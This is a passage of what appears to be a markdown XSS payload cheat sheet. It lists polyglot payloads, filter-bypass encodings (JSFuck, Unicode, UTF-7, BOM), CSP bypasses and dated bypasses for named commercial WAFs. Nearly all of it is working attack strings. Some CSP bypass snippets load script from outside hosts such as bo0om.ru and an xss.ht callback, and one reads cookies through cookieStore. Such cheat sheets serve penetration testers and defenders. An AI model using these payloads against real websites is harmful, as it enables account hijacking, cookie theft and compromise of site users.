Karlsson - -```javascript -" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -``` - -Polyglot XSS - Rsnake - -```javascript -';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> -``` - -Polyglot XSS - Daniel Miessler - -```javascript -';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> -javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* -javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a -javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ -javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* -javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* -javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// -javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* ---></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* -/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* -javascript://--></title></style></textarea></script><svg "//' onclick=alert()// -/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -``` - -Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) -![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) - -```javascript --->'"/></sCript><svG x=">" onload=(co\u006efirm)``> -``` - -![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) - -```javascript -<svg%0Ao%00nload=%09((pro\u006dpt))()// -``` - -Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml) - -```javascript -# by crlf -javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> - -# by europa -javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> - -# by EdOverflow -javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> - -# by h1/ragnar -javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` -``` - -Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) -```javascript -JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> -``` - -## Filter Bypass and exotic payloads - -### Bypass case sensitive - -```javascript -<sCrIpt>alert(1)</ScRipt> -``` - -### Bypass tag blacklist - -```javascript -<script x> -<script x>alert('XSS')<script y> -``` - -### Bypass word blacklist with code evaluation - -```javascript -eval('ale'+'rt(0)'); -Function("ale"+"rt(1)")(); -new Function`al\ert\`6\``; -setTimeout('ale'+'rt(2)'); -setInterval('ale'+'rt(10)'); -Set.constructor('ale'+'rt(13)')(); -Set.constructor`al\x65rt\x2814\x29```; -``` - -### Bypass with incomplete html tag - -Works on IE/Firefox/Chrome/Safari - -```javascript -<img src='1' onerror='alert(0)' < -``` - -### Bypass quotes for string - -```javascript -String.fromCharCode(88,83,83) -``` - -### Bypass quotes in script tag - -```javascript -http://localhost/bla.php?test=</script><script>alert(1)</script> -<html> - <script> - <?php echo 'foo="text '.$_GET['test'].'";';`?> - </script> -</html> -``` - -### Bypass quotes in mousedown event - -You can bypass a single quote with &#39; in an on mousedown event handler - -```javascript -<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> -``` - -### Bypass dot filter - -```javascript -<script>window['alert'](document['domain'])</script> -``` - -Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` -http://www.geektools.com/cgi-bin/ipconv.cgi - -```javascript -<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script> -``` - -Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` - -### Bypass parenthesis for string - -```javascript -alert`1` -setTimeout`alert\u0028document.domain\u0029`; -``` - -### Bypass parenthesis and semi colon - -```javascript -// From @garethheyes -<script>onerror=alert;throw 1337</script> -<script>{onerror=alert}throw 1337</script> -<script>throw onerror=alert,'some string',123,'haha'</script> - -// From @terjanq -<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> - -// From @cgvwzq -<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> -``` - -### Bypass onxxxx= blacklist - -```javascript -<object onafterscriptexecute=confirm(0)> -<object onbeforescriptexecute=confirm(0)> - -// Bypass onxxx= filter with a null byte/vertical tab -<img src='1' onerror\x00=alert(0) /> -<img src='1' onerror\x0b=alert(0) /> - -// Bypass onxxx= filter with a '/' -<img src='1' onerror/=alert(0) /> -``` - -### Bypass space filter - -```javascript -// Bypass space filter with "/" -<img/src='1'/onerror=alert(0)> - -// Bypass space filter with 0x0c/^L -<svg onload = alert(1) > - -$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd -00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al -00000010: 6572 7428 3129 0c3e 0a ert(1).>. -``` - -### Bypass email filter - -([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) - -```javascript -"><svg/onload=confirm(1)>"@x.y -``` - -### Bypass document blacklist - -```javascript -<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> -window["doc"+"ument"] -``` - -### Bypass document.cookie blacklist - -This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. - -``` -window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); -``` - -### Bypass using javascript inside a string - -```javascript -<script> -foo="text </script><script>alert(1)</script>"; -</script> -``` - -### Bypass using an alternate way to redirect - -```javascript -location="http://google.com" -document.location = "http://google.com" -document.location.href="http://google.com" -window.location.assign("http://google.com") -window['location']['href']="http://google.com" -``` - -### Bypass using an alternate way to execute an alert - -From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. - -```javascript -window['alert'](0) -parent['alert'](1) -self['alert'](2) -top['alert'](3) -this['alert'](4) -frames['alert'](5) -content['alert'](6) - -[7].map(alert) -[8].find(alert) -[9].every(alert) -[10].filter(alert) -[11].findIndex(alert) -[12].forEach(alert); -``` - -From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables - -The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. - -```javascript -c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } -// 5 -``` - -Then calling alert is : - -```javascript -Object.keys(self)[5] -// "alert" -self[Object.keys(self)[5]]("1") // alert("1") -``` - -We can find "alert" with a regular expression like ^a[rel]+t$ : - -```javascript -a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() - -// then you can use a() with Object.keys - -self[Object.keys(self)[a()]]("1") // alert("1") -``` - -Oneliner: -```javascript -a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") -``` - -From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. - -```javascript -prompt`${document.domain}` -document.location='java\tscript:alert(1)' -document.location='java\rscript:alert(1)' -document.location='java\tscript:alert(1)' -``` - -From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. - -```javascript -eval('ale'+'rt(0)'); -Function("ale"+"rt(1)")(); -new Function`al\ert\`6\``; - -constructor.constructor("aler"+"t(3)")(); -[].filter.constructor('ale'+'rt(4)')(); - -top["al"+"ert"](5); -top[8680439..toString(30)](7); -top[/al/.source+/ert/.source](8); -top['al\x65rt'](9); - -open('java'+'script:ale'+'rt(11)'); -location='javascript:ale'+'rt(12)'; - -setTimeout`alert\u0028document.domain\u0029`; -setTimeout('ale'+'rt(2)'); -setInterval('ale'+'rt(10)'); -Set.constructor('ale'+'rt(13)')(); -Set.constructor`al\x65rt\x2814\x29```; -``` - -Bypass using an alternate way to trigger an alert - -```javascript -var i = document.createElement("iframe"); -i.onload = function(){ - i.contentWindow.alert(1); -} -document.appendChild(i); - -// Bypassed security -XSSObject.proxy = function (obj, name, report_function_name, exec_original) { - var proxy = obj[name]; - obj[name] = function () { - if (exec_original) { - return proxy.apply(this, arguments); - } - }; - XSSObject.lockdown(obj, name); - }; -XSSObject.proxy(window, 'alert', 'window.alert', false); -``` - -### Bypass ">" using nothing - -You don't need to close your tags. - -```javascript -<svg onload=alert(1)// -``` - -### Bypass "<" and ">" using < and > - -Unicode Character U+FF1C and U+FF1E - -```javascript -<script/src=//evil.site/poc.js> -``` - -### Bypass ";" using another character - -```javascript -'te' * alert('*') * 'xt'; -'te' / alert('/') / 'xt'; -'te' % alert('%') % 'xt'; -'te' - alert('-') - 'xt'; -'te' + alert('+') + 'xt'; -'te' ^ alert('^') ^ 'xt'; -'te' > alert('>') > 'xt'; -'te' < alert('<') < 'xt'; -'te' == alert('==') == 'xt'; -'te' & alert('&') & 'xt'; -'te' , alert(',') , 'xt'; -'te' | alert('|') | 'xt'; -'te' ? alert('ifelsesh') : 'xt'; -'te' in alert('in') in 'xt'; -'te' instanceof alert('instanceof') instanceof 'xt'; -``` - -### Bypass using HTML encoding - -```javascript -%26%2397;lert(1) -&#97;&#108;&#101;&#114;&#116; -></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> -``` - -### Bypass using Katana - -Using the [Katakana](https://github.com/aemkei/katakana.js) library. - -```javascript -javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() -``` - -### Bypass using Cuneiform - -```javascript -𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], -𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] -+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] -+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() -``` - -### Bypass using Lontara - -```javascript -ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")() -``` - -More alphabets on http://aem1k.com/aurebesh.js/# - -### Bypass using ECMAScript6 - -```html -<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script> -``` - -### Bypass using Octal encoding - -```javascript -javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' -``` - -### Bypass using Unicode - -```javascript -Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was -transformed into U+003C LESS­THAN SIGN (<) - -Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was -transformed into U+0022 QUOTATION MARK (") - -Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was -transformed into U+0027 APOSTROPHE (') - -E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ -%EF%BC%9E becomes > -%EF%BC%9C becomes < -``` - -Bypass using Unicode converted to uppercase - -```javascript -İ (%c4%b0).toLowerCase() => i -ı (%c4%b1).toUpperCase() => I -ſ (%c5%bf) .toUpperCase() => S -K (%E2%84%AA).toLowerCase() => k - -<ſvg onload=... > become <SVG ONLOAD=...> -<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=> -``` - -### Bypass using UTF-7 - -```javascript -+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- -``` - -### Bypass using UTF-8 - -```javascript -< = %C0%BC = %E0%80%BC = %F0%80%80%BC -> = %C0%BE = %E0%80%BE = %F0%80%80%BE -' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 -" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 -" = %CA%BA -' = %CA%B9 -``` - -### Bypass using UTF-16be - -```javascript -%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 -\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> -``` - -### Bypass using UTF-32 - -```js -%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E -``` - -### Bypass using BOM - -Byte Order Mark (The page must begin with the BOM character.) -BOM character allows you to override charset of the page - -```js -BOM Character for UTF-16 Encoding: -Big Endian : 0xFE 0xFF -Little Endian : 0xFF 0xFE -XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E - -BOM Character for UTF-32 Encoding: -Big Endian : 0x00 0x00 0xFE 0xFF -Little Endian : 0xFF 0xFE 0x00 0x00 -XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E -``` - -### Bypass using weird encoding or native interpretation - -```javascript -<script>\u0061\u006C\u0065\u0072\u0074(1)</script> -<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> -<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> -<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> -<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> -``` - -### Bypass using jsfuck - -Bypass using [jsfuck](http://www.jsfuck.com/) - -```javascript -[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() -``` - -## CSP Bypass - -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) - -### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) - -//google.com/complete/search?client=chrome&jsonp=alert(1); - -```js -<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" -``` - -More JSONP endpoints: -* [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt) -* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) - -### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa) - -Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;) - -```js -script=document.createElement('script'); -script.src='//bo0om.ru/csp.js'; -window.frames[0].document.head.appendChild(script); -``` - -### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) - -```js -// CSP Bypass with Inline and Eval -d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) -``` - -### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen) - -Works for CSP like `script-src self` - -```js -<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> -``` - -### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072) - -Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src). - -```javascript -<script src="data:,alert(1)">/</script> -``` - - -## Common WAF Bypass - -### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) - -#### 25st January 2021 - -```html -<svg/onrandom=random onload=confirm(1)> -<video onnull=null onmouseover=confirm(1)> -``` - -#### 21st April 2020 - -```html -<svg/OnLoad="`${prompt``}`"> -``` - -#### 22nd August 2019 - -```html -<svg/onload=%26nbsp;alert`bohdan`+ -``` - -#### 5th June 2019 - -```html -1'"><img/src/onerror=.1|alert``> -``` - -#### 3rd June 2019 - -```html -<svg onload=prompt%26%230000000040document.domain)> -<svg onload=prompt%26%23x000000028;document.domain)> -xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> -``` - -### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10) - -``` -<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f -``` - -### Cloudflare XSS Bypass - 27th February 2018 - -```html -<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a> -``` - -### Chrome Auditor - 9th August 2018 - -```javascript -</script><svg><script>alert(1)-%26apos%3B -``` - -Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B) - -### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018 - -```javascript -anythinglr00</script><script>alert(document.domain)</script>uxldz - -anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz -``` - -### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018 - -```javascript -<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> -``` - -### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019 - -```html -<svg onload\r\n=$.globalEval("al"+"ert()");> -``` - -### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018 - -```javascript -?"></script><base%20c%3D=href%3Dhttps:\mysite> -``` - -### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018 - -```html -<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> -``` - -### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018 - -```javascript -<a href=javas&#99;ript:alert(1)> -``` - -### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 - -```javascript -\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e -``` - -## Labs - -* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting) - -## References - -- 